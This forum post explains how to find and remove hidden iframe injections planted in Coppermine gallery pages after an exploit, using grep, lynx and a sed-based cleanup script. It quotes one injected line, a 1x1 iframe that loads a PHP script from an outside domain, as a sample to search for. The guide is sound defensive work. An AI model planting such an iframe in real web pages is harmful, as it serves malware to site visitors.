Please note the latest version of coppermine covers this issue. If you haven't updated it's your own fault.
Note this describes me working on a FreeBSD server. I suppose it will also work on a Linux Server. Windows I have no idea.
With the recent exploit on mysql and my own concerns for security. I figured I would help out those who are not 24/7 sys admins.
The exploit caused some out there to be hijacked by snot nosed script kiddies who put nasty things in coppermine pages and made life miserable for windoze users who are affected by every virus out there.
The script would be placed in an iframe tag with a wierd numbered picture.
You can find by going to your coppermine directory and running this command:
grep -r 'iframe src' *
If you see something like this:
albums/userpics/10001/45563131x.jpg:echo <iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>
It could be bad.
You could also discover it by doing this:
lynx -dump
http://foo.com/copperminedirectory/thumbnails.php?album=XXX (where XXX is the number of an album)
Lynx is a *nix based text browser.
You would see in the output something like this:
References
Visible links
1.
http://flboioawone.com <-- not a real link. The gibberish type URL is what you are looking for.
What you want to make note of is the numbered .jpg (45563131x.jpg shown under the grep command) and the wierd url shown under the lynx command.
Both of these would be signs that someone who still lives in mom's basement exploited a vulnerability.
You job is to remove them.
How do we do that.
Coppermine has a nice shell script.
#!/bin/sh
grep -rl '<iframe src="h' . > /tmp/l
for i in $(grep '\.php$' /tmp/l); do
cp $i $i.corr
sed "s/<?php echo '<iframe.*<\/iframe>'; ?>//g" $i.corr > $i
done
for i in $(grep '\.html\?$' /tmp/l); do
cp $i $i.corr;
sed 's/<iframe src="h.*<\/iframe>//g' $i.corr > $i
done
for i in $(cat /tmp/l); do
test -f $i.corr && rm $i.corr || echo TODO: $i
done
But you will note that I needed to modify mine
I had 'h in my iframes not "h. So I had to modify the script a little.
Save the script in your coppermine directory with a nice name like dieiframe and chmod +x then run ./dieiframe and see what the results are.
Run grep -r 'iframe src' * to be sure.
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (not your number may be different).
You should also change your login password for admin and users just to be safe.
Sincerely,
Brendhan
